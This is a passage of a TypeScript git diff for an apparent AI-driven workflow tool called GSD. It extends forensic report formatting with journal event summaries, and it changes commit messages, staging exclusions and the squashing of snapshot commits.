${js.newestEntry}`); + sections.push(``); + sections.push(`### Event Type Distribution`, ``); + sections.push(`| Event Type | Count |`); + sections.push(`|------------|-------|`); + for (const [evType, count] of Object.entries(js.eventCounts).sort((a, b) => b[1] - a[1])) { + sections.push(`| ${evType} | ${count} |`); + } + sections.push(``); + if (js.recentEvents.length > 0) { + sections.push(`### Recent Journal Events (last ${js.recentEvents.length})`, ``); + for (const ev of js.recentEvents) { + const parts = [`${ev.ts} [${ev.eventType}] flow=${ev.flowId.slice(0, 8)}`]; + if (ev.rule) parts.push(`rule=${ev.rule}`); + if (ev.unitId) parts.push(`unit=${ev.unitId}`); + sections.push(`- ${parts.join(" ")}`); + } + sections.push(``); + } + } + writeFileSync(filePath, sections.join("\n"), "utf-8"); return filePath; } +// ─── Forensics Session Marker ──────────────────────────────────────────────── + +export interface ForensicsMarker { + reportPath: string; + promptContent: string; + createdAt: string; +} + +/** + * Write a marker file so that buildBeforeAgentStartResult() can re-inject + * the forensics prompt on follow-up turns. (#2941) + */ +export function writeForensicsMarker(basePath: string, reportPath: string, promptContent: string): void { + const dir = join(gsdRoot(basePath), "runtime"); + mkdirSync(dir, { recursive: true }); + const marker: ForensicsMarker = { + reportPath, + promptContent, + createdAt: new Date().toISOString(), + }; + writeFileSync(join(dir, "active-forensics.json"), JSON.stringify(marker), "utf-8"); +} + +/** + * Read the active forensics marker, or null if none exists. 
+ */ +export function readForensicsMarker(basePath: string): ForensicsMarker | null { + const markerPath = join(gsdRoot(basePath), "runtime", "active-forensics.json"); + if (!existsSync(markerPath)) return null; + try { + return JSON.parse(readFileSync(markerPath, "utf-8")) as ForensicsMarker; + } catch { + return null; + } +} + // ─── Prompt Formatter ───────────────────────────────────────────────────────── function formatReportForPrompt(report: ForensicReport): string { @@ -589,8 +1105,51 @@ function formatReportForPrompt(report: ForensicReport): string { sections.push(""); } - // Completed keys count - sections.push(`### Completed Keys: ${report.completedKeys.length}`); + // Activity log metadata + if (report.activityLogMeta) { + const meta = report.activityLogMeta; + sections.push("### Activity Log Overview"); + sections.push(`- Files: ${meta.fileCount}, Total size: ${(meta.totalSizeBytes / 1024).toFixed(1)} KB`); + if (meta.oldestFile) sections.push(`- Oldest: ${meta.oldestFile}`); + if (meta.newestFile) sections.push(`- Newest: ${meta.newestFile}`); + sections.push(""); + } + + // Journal summary — structured event timeline + if (report.journalSummary) { + const js = report.journalSummary; + sections.push("### Journal Summary (Iteration Event Log)"); + sections.push(`- Total entries: ${js.totalEntries}, Distinct flows: ${js.flowCount}, Daily files: ${js.fileCount}`); + if (js.oldestEntry) sections.push(`- Date range: ${js.oldestEntry} — ${js.newestEntry}`); + + // Event type distribution (compact) + const eventPairs = Object.entries(js.eventCounts).sort((a, b) => b[1] - a[1]); + sections.push(`- Events: ${eventPairs.map(([t, c]) => `${t}(${c})`).join(", ")}`); + + // Recent events timeline (for tracing what just happened) + if (js.recentEvents.length > 0) { + sections.push(""); + sections.push(`**Recent Journal Events (last ${js.recentEvents.length}):**`); + for (const ev of js.recentEvents) { + const parts = [`${ev.ts} [${ev.eventType}] 
flow=${ev.flowId.slice(0, 8)}`]; + if (ev.rule) parts.push(`rule=${ev.rule}`); + if (ev.unitId) parts.push(`unit=${ev.unitId}`); + sections.push(`- ${parts.join(" ")}`); + } + } + sections.push(""); + } + + // Completion status — prefer DB counts, fall back to legacy completed-units.json + if (report.dbCompletionCounts) { + const c = report.dbCompletionCounts; + sections.push(`### Completion Status (from DB)`); + sections.push(`- ${c.milestones}/${c.milestonesTotal} milestones complete`); + sections.push(`- ${c.slices}/${c.slicesTotal} slices complete`); + sections.push(`- ${c.tasks}/${c.tasksTotal} tasks complete`); + } else { + sections.push(`### Completed Keys: ${report.completedKeys.length}`); + } sections.push(`### GSD Version: ${report.gsdVersion}`); sections.push(`### Active Milestone: ${report.activeMilestone ?? "none"}`); sections.push(`### Active Slice: ${report.activeSlice ?? "none"}`); diff --git a/src/resources/extensions/gsd/git-constants.ts b/src/resources/extensions/gsd/git-constants.ts index 7213798ca..4925f4271 100644 --- a/src/resources/extensions/gsd/git-constants.ts +++ b/src/resources/extensions/gsd/git-constants.ts @@ -8,4 +8,5 @@ export const GIT_NO_PROMPT_ENV = { GIT_TERMINAL_PROMPT: "0", GIT_ASKPASS: "", GIT_SVN_ID: "", + LC_ALL: "C", // force English git output so stderr string checks work on all locales (#1997) }; diff --git a/src/resources/extensions/gsd/git-service.ts b/src/resources/extensions/gsd/git-service.ts index 00b4f717f..ae73a0e94 100644 --- a/src/resources/extensions/gsd/git-service.ts +++ b/src/resources/extensions/gsd/git-service.ts @@ -9,7 +9,7 @@ */ import { execFileSync, execSync } from "node:child_process"; -import { existsSync, mkdirSync, readFileSync, writeFileSync } from "node:fs"; +import { existsSync, mkdirSync, readFileSync, readdirSync, writeFileSync } from "node:fs"; import { join } from "node:path"; import { gsdRoot } from "./paths.js"; import { GIT_NO_PROMPT_ENV } from "./git-constants.js"; @@ -18,8 +18,8 @@ 
import { loadEffectiveGSDPreferences } from "./preferences.js"; import { detectWorktreeName, - SLICE_BRANCH_RE, } from "./worktree.js"; +import { SLICE_BRANCH_RE, QUICK_BRANCH_RE, WORKFLOW_BRANCH_RE } from "./branch-patterns.js"; import { nativeGetCurrentBranch, nativeDetectMainBranch, @@ -32,6 +32,8 @@ import { nativeRmCached, nativeUpdateRef, nativeAddPaths, + nativeResetSoft, + nativeCommitSubject, } from "./native-git-bridge.js"; import { GSDError, GSD_MERGE_CONFLICT, GSD_GIT_ERROR } from "./errors.js"; import { getErrorMessage } from "./error-utils.js"; @@ -50,9 +52,9 @@ export interface GitPreferences { main_branch?: string; merge_strategy?: "squash" | "merge"; /** Controls auto-mode git isolation strategy. - * - "worktree": (default) creates a milestone worktree for isolated work + * - "worktree": creates a milestone worktree for isolated work * - "branch": works directly in the project root (for submodule-heavy repos) - * - "none": no git isolation — commits land on the user's current branch directly + * - "none": (default) no git isolation — commits land on the user's current branch directly */ isolation?: "worktree" | "branch" | "none"; /** When false, GSD will not modify .gitignore at all — no baseline patterns @@ -77,6 +79,11 @@ export interface GitPreferences { * Default: the main branch (from `main_branch` or auto-detected). */ pr_target_branch?: string; + /** Whether to squash `gsd snapshot:` commits into the next real autoCommit. + * Enabled by default. Set to false to keep snapshot commits in history + * for forensic inspection. + */ + absorb_snapshot_commits?: boolean; } export const VALID_BRANCH_NAME = /^[a-zA-Z0-9_\-\/.]+$/; @@ -102,23 +109,25 @@ export interface TaskCommitContext { /** * Build a meaningful conventional commit message from task execution context. - * Format: `{type}({sliceId}/{taskId}): {description}` + * Format: `{type}: {description}` (clean conventional commit — no GSD IDs in subject). 
+ * + * GSD metadata is placed in a `GSD-Task:` git trailer at the end of the body, + * following the same convention as `Signed-off-by:` or `Co-Authored-By:`. * * The description is the task summary one-liner if available (it describes * what was actually built), falling back to the task title (what was planned). */ export function buildTaskCommitMessage(ctx: TaskCommitContext): string { - const scope = ctx.taskId; // e.g. "S01/T02" or just "T02" const description = ctx.oneLiner || ctx.taskTitle; const type = inferCommitType(ctx.taskTitle, ctx.oneLiner); - // Truncate description to ~72 chars for subject line - const maxDescLen = 68 - type.length - scope.length; + // Truncate description to ~72 chars for subject line (full budget without scope) + const maxDescLen = 70 - type.length; const truncated = description.length > maxDescLen ? description.slice(0, maxDescLen - 1).trimEnd() + "…" : description; - const subject = `${type}(${scope}): ${truncated}`; + const subject = `${type}: ${truncated}`; // Build body with key files if available const bodyParts: string[] = []; @@ -131,15 +140,14 @@ export function buildTaskCommitMessage(ctx: TaskCommitContext): string { bodyParts.push(fileLines); } + // Trailers: GSD-Task first, then Resolves + bodyParts.push(`GSD-Task: ${ctx.taskId}`); + if (ctx.issueNumber) { bodyParts.push(`Resolves #${ctx.issueNumber}`); } - if (bodyParts.length > 0) { - return `${subject}\n\n${bodyParts.join("\n\n")}`; - } - - return subject; + return `${subject}\n\n${bodyParts.join("\n\n")}`; } /** @@ -196,6 +204,10 @@ export const RUNTIME_EXCLUSION_PATHS: readonly string[] = [ ".gsd/completed-units.json", ".gsd/STATE.md", ".gsd/gsd.db", + ".gsd/gsd.db-shm", // SQLite WAL sidecar — always created alongside gsd.db (#2296) + ".gsd/gsd.db-wal", // SQLite WAL sidecar — always created alongside gsd.db (#2296) + ".gsd/journal/", // daily-rotated JSONL event journal (#2296) + ".gsd/doctor-history.jsonl", // doctor run history (#2296) 
".gsd/DISCUSSION-MANIFEST.json", ]; @@ -238,14 +250,13 @@ export function readIntegrationBranch(basePath: string, milestoneId: string): st * * The file is committed immediately so the metadata is persisted in git. */ -/** Regex matching GSD quick-task branches: gsd/quick/- */ -export const QUICK_BRANCH_RE = /^gsd\/quick\//; +/** Re-export for backward compatibility — canonical definitions in branch-patterns.ts */ +export { QUICK_BRANCH_RE, WORKFLOW_BRANCH_RE } from "./branch-patterns.js"; export function writeIntegrationBranch( basePath: string, milestoneId: string, branch: string, - _options?: { commitDocs?: boolean }, ): void { // Don't record slice branches as the integration target if (SLICE_BRANCH_RE.test(branch)) return; @@ -253,6 +264,10 @@ export function writeIntegrationBranch( // to their origin branch on completion. Recording one as the integration // target causes milestone merges to land on the wrong branch (#1293). if (QUICK_BRANCH_RE.test(branch)) return; + // Don't record workflow-template branches (hotfix, bugfix, spike, etc.) — + // same root cause as quick-task branches (#2498). All templates create + // gsd// branches that are ephemeral. + if (WORKFLOW_BRANCH_RE.test(branch)) return; // Validate if (!VALID_BRANCH_NAME.test(branch)) return; // Skip if already recorded with the same branch (idempotent across restarts). @@ -437,11 +452,6 @@ export class GitServiceImpl { this._milestoneId = milestoneId; } - /** Convenience wrapper: run git in this repo's basePath. */ - private git(args: string[], options: { allowFailure?: boolean; input?: string } = {}): string { - return runGit(this.basePath, args, options); - } - /** * Smart staging: `git add -A` excluding GSD runtime paths via pathspec. * Falls back to plain `git add -A` if the exclusion pathspec fails. @@ -485,6 +495,29 @@ export class GitServiceImpl { // If .gsd/ IS in .gitignore (the default for external state projects), // git add -A already skips it and the exclusions are harmless no-ops. 
const allExclusions = [...RUNTIME_EXCLUSION_PATHS, ...extraExclusions]; + + // ── Parallel worker milestone scope (#1991) ── + // When GSD_MILESTONE_LOCK is set, this process is a parallel worker that + // must only commit files belonging to its own milestone. Exclude all other + // milestone directories from staging to prevent cross-milestone pollution + // (e.g., an M033 worker fabricating M032 artifacts in the same commit). + const milestoneLock = process.env.GSD_MILESTONE_LOCK; + if (milestoneLock) { + const msDir = join(gsdRoot(this.basePath), "milestones"); + if (existsSync(msDir)) { + try { + const entries = readdirSync(msDir, { withFileTypes: true }); + for (const entry of entries) { + if (entry.isDirectory() && entry.name !== milestoneLock) { + allExclusions.push(`.gsd/milestones/${entry.name}/`); + } + } + } catch { + // Best-effort — if we can't read the milestones dir, proceed without scoping + } + } + } + nativeAddAllWithExclusions(this.basePath, allExclusions); } @@ -535,11 +568,97 @@ export class GitServiceImpl { const message = taskContext ? buildTaskCommitMessage(taskContext) - : `chore(${unitId}): auto-commit after ${unitType}`; + : `chore: auto-commit after ${unitType}\n\nGSD-Unit: ${unitId}`; nativeCommit(this.basePath, message, { allowEmpty: false }); + + // Absorb any preceding gsd snapshot commits into this real commit. + // Walk backwards from HEAD~1 counting consecutive snapshot subjects, + // then soft-reset to before them and re-commit with the same message. + this.absorbSnapshotCommits(message); + return message; } + /** + * Squash consecutive `gsd snapshot:` commits that sit immediately below + * HEAD into the current HEAD commit. This keeps the git history clean + * after automated snapshot commits are superseded by real work. + * + * Guards: + * - Opt-in via `absorb_snapshot_commits` preference (default: true). + * - Refuses to rewrite commits that have been pushed to the remote + * tracking branch (checks merge-base ancestry). 
+ * - Saves HEAD SHA before reset; restores it if the re-commit fails. + * + * Does nothing if there are no snapshot commits to absorb. + */ + private absorbSnapshotCommits(headMessage: string): void { + try { + // Opt-in guard — users can disable to keep snapshot commits for forensics + if (this.prefs.absorb_snapshot_commits === false) return; + + const GSD_SNAPSHOT_PREFIX = "gsd snapshot:"; + let count = 0; + + // Walk back from HEAD~1 counting consecutive snapshot commits (cap at 10) + for (let i = 1; i <= 10; i++) { + const subject = nativeCommitSubject(this.basePath, `HEAD~${i}`); + if (!subject.startsWith(GSD_SNAPSHOT_PREFIX)) break; + count = i; + } + + if (count === 0) return; + + // Guard: don't rewrite history that has been pushed to the remote. + // Check whether the newest snapshot commit (HEAD~1) is already + // reachable from the remote tracking branch. If it is, the snapshots + // have been pushed and must not be squashed via local history rewrite. + // (Checking resetTarget instead would false-positive when the remote + // is at the pre-snapshot base but the snapshots themselves are local.) 
+ const resetTarget = `HEAD~${count + 1}`; + try { + const branch = nativeGetCurrentBranch(this.basePath); + if (branch) { + const remoteBranch = `origin/${branch}`; + // merge-base --is-ancestor exits 0 if HEAD~1 is ancestor of remote + execFileSync("git", ["merge-base", "--is-ancestor", "HEAD~1", remoteBranch], { + cwd: this.basePath, + stdio: ["ignore", "pipe", "pipe"], + }); + // If we get here, newest snapshot IS reachable from remote — already pushed + return; + } + } catch { + // Not an ancestor or remote doesn't exist — safe to proceed + } + + // Save HEAD SHA so we can restore if the re-commit fails + const savedHead = execFileSync("git", ["rev-parse", "HEAD"], { + cwd: this.basePath, + stdio: ["ignore", "pipe", "pipe"], + encoding: "utf-8", + }).trim(); + + nativeResetSoft(this.basePath, resetTarget); + + // Re-run smartStage so the same RUNTIME_EXCLUSION_PATHS apply. + // Snapshot commits used nativeAddTracked (git add -u) which stages + // ALL tracked modifications including .gsd/ state files. Without + // re-staging, those .gsd/ changes leak into the absorbed commit. + this.smartStage(); + + try { + nativeCommit(this.basePath, headMessage, { allowEmpty: false }); + } catch { + // Re-commit failed — restore original HEAD to avoid leaving the + // repo in a partially-reset state with no commit + nativeResetSoft(this.basePath, savedHead); + } + } catch { + // Non-fatal — if squash fails, the commits remain unsquashed + } + } + // ─── Branch Queries ──────────────────────────────────────────────────── /** @@ -600,18 +719,14 @@ export class GitServiceImpl { return nativeGetCurrentBranch(this.basePath); } - /** True if currently on a GSD slice branch. */ - // ─── Branch Lifecycle ────────────────────────────────────────────────── - - // ─── S05 Features ───────────────────────────────────────────────────── - /** * Create a snapshot ref for the given label (typically a slice branch name). - * Gated on prefs.snapshots === true. Ref path: refs/gsd/snapshots/